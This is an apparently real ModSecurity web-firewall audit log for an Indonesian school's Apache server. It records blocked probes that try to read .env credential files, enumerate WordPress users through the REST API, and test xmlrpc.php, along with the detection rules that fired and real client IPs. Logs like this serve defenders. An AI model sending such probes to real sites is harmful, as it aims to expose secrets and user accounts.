"CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746744962064710 10525 (- - -) Stopwatch2: 1746744962064710 10525; combined=19786, p1=258, p2=0, p3=0, p4=0, p5=9781, sr=65, sw=0, l=0, gc=9747 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f175707-Z-- --f878c24d-A-- [09/May/2025:05:56:02 +0700] aB02glqQ1nOVx9fWpZS3iAAAAAM 103.236.140.4 58722 103.236.140.4 8181 --f878c24d-B-- GET /application/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f878c24d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f878c24d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746744962760646 844 (- - -) Stopwatch2: 1746744962760646 844; combined=320, p1=280, p2=0, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f878c24d-Z-- --e8f59c11-A-- [09/May/2025:06:13:48 +0700] aB06rC-fAO47ojYKsMoOBAAAAEU 103.236.140.4 33038 103.236.140.4 8181 --e8f59c11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e8f59c11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8f59c11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746746028169318 3297 (- - -) Stopwatch2: 1746746028169318 3297; combined=1447, p1=459, p2=956, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8f59c11-Z-- --b5e2790f-A-- [09/May/2025:06:13:55 +0700] aB06sy-fAO47ojYKsMoOCgAAAE4 103.236.140.4 33068 103.236.140.4 8181 --b5e2790f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b5e2790f-C-- demo.sayHello --b5e2790f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5e2790f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746746035491594 6462 (- - -) Stopwatch2: 1746746035491594 6462; combined=4706, p1=598, p2=3865, p3=38, p4=43, p5=96, sr=77, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5e2790f-Z-- --b5e40763-A-- [09/May/2025:06:44:40 +0700] aB1B6FoC-7ITMWTA_c93AwAAAM0 103.236.140.4 45222 103.236.140.4 8181 --b5e40763-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b5e40763-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5e40763-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746747880340549 3089 (- - -) Stopwatch2: 1746747880340549 3089; combined=1318, p1=468, p2=812, p3=0, p4=0, p5=38, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5e40763-Z-- --20d5ea1b-A-- [09/May/2025:06:44:46 +0700] aB1B7loC-7ITMWTA_c93EgAAANA 103.236.140.4 45282 103.236.140.4 8181 --20d5ea1b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20d5ea1b-C-- demo.sayHello --20d5ea1b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20d5ea1b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746747886308825 7064 (- - -) Stopwatch2: 1746747886308825 7064; combined=5038, p1=622, p2=4131, p3=39, p4=46, p5=116, sr=75, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20d5ea1b-Z-- --7220f57b-A-- [09/May/2025:06:45:53 +0700] aB1CMS-fAO47ojYKsMoRXAAAAEU 103.236.140.4 45920 103.236.140.4 8181 --7220f57b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7220f57b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7220f57b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746747953882457 2306 (- - -) Stopwatch2: 1746747953882457 2306; combined=1267, p1=399, p2=839, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7220f57b-Z-- --e383504c-A-- [09/May/2025:06:46:01 +0700] aB1COR6q_ZMebht3q15ONgAAAJU 103.236.140.4 45990 103.236.140.4 8181 --e383504c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.196 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e383504c-C-- demo.sayHello --e383504c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e383504c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746747961683294 6764 (- - -) Stopwatch2: 1746747961683294 6764; combined=4955, p1=591, p2=4107, p3=38, p4=42, p5=103, sr=74, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e383504c-Z-- --41853c13-A-- [09/May/2025:06:46:39 +0700] aB1CXx6q_ZMebht3q15OUwAAAIQ 103.236.140.4 46346 103.236.140.4 8181 --41853c13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --41853c13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41853c13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746747999268158 2861 (- - -) Stopwatch2: 1746747999268158 2861; combined=1332, p1=470, p2=833, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41853c13-Z-- --313e6d4a-A-- [09/May/2025:06:46:49 +0700] aB1CaVqQ1nOVx9fWpZS7mAAAAA8 103.236.140.4 46438 103.236.140.4 8181 --313e6d4a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --313e6d4a-C-- demo.sayHello --313e6d4a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --313e6d4a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746748009539098 6208 (- - -) Stopwatch2: 1746748009539098 6208; combined=4525, p1=634, p2=3654, p3=31, p4=35, p5=100, sr=128, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --313e6d4a-Z-- --ee230f56-A-- [09/May/2025:06:49:09 +0700] aB1C9VoC-7ITMWTA_c93qQAAAM8 103.236.140.4 47716 103.236.140.4 8181 --ee230f56-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.89.107.241 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.89.107.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ee230f56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee230f56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746748149214253 824 (- - -) Stopwatch2: 1746748149214253 824; combined=335, p1=282, p2=0, p3=0, p4=0, p5=52, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee230f56-Z-- --d8ccf723-A-- [09/May/2025:07:28:29 +0700] aB1MLS-fAO47ojYKsMoX4wAAAE8 103.236.140.4 41644 103.236.140.4 8181 --d8ccf723-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d8ccf723-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8ccf723-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746750509282534 2538 (- - -) Stopwatch2: 1746750509282534 2538; combined=1263, p1=408, p2=825, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8ccf723-Z-- --bc54d82a-A-- [09/May/2025:07:28:34 +0700] aB1MMloC-7ITMWTA_c96-AAAAMQ 103.236.140.4 41696 103.236.140.4 8181 --bc54d82a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bc54d82a-C-- demo.sayHello --bc54d82a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc54d82a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746750514544142 5810 (- - -) Stopwatch2: 1746750514544142 5810; combined=4315, p1=547, p2=3541, p3=32, p4=35, p5=95, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc54d82a-Z-- --8d3db079-A-- [09/May/2025:07:28:35 +0700] aB1MM1oC-7ITMWTA_c96-wAAAMk 103.236.140.4 41706 103.236.140.4 8181 --8d3db079-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8d3db079-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d3db079-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746750515355367 2803 (- - -) Stopwatch2: 1746750515355367 2803; combined=1252, p1=429, p2=794, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d3db079-Z-- --891bca6e-A-- [09/May/2025:07:28:44 +0700] aB1MPFoC-7ITMWTA_c97CgAAAM0 103.236.140.4 41792 103.236.140.4 8181 --891bca6e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.55 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --891bca6e-C-- demo.sayHello --891bca6e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --891bca6e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746750524065154 6228 (- - -) Stopwatch2: 1746750524065154 6228; combined=4584, p1=605, p2=3702, p3=30, p4=33, p5=125, sr=130, sw=89, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --891bca6e-Z-- --dad87b24-A-- [09/May/2025:07:32:42 +0700] aB1NKi-fAO47ojYKsMoYXwAAAEo 103.236.140.4 44048 103.236.140.4 8181 --dad87b24-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dad87b24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dad87b24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746750762927182 2941 (- - -) Stopwatch2: 1746750762927182 2941; combined=1218, p1=444, p2=741, p3=0, p4=0, p5=32, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dad87b24-Z-- --ee735e08-A-- [09/May/2025:07:32:50 +0700] aB1NMi-fAO47ojYKsMoYZwAAAEI 103.236.140.4 44120 103.236.140.4 8181 --ee735e08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.25 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ee735e08-C-- demo.sayHello --ee735e08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee735e08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746750770247520 6092 (- - -) Stopwatch2: 1746750770247520 6092; combined=4458, p1=593, p2=3524, p3=35, p4=34, p5=150, sr=127, sw=122, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee735e08-Z-- --d665d043-A-- [09/May/2025:08:02:32 +0700] aB1UKFoC-7ITMWTA_c97_AAAANA 103.236.140.4 45922 103.236.140.4 8181 --d665d043-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d665d043-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d665d043-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746752552903569 2816 (- - -) Stopwatch2: 1746752552903569 2816; combined=1257, p1=438, 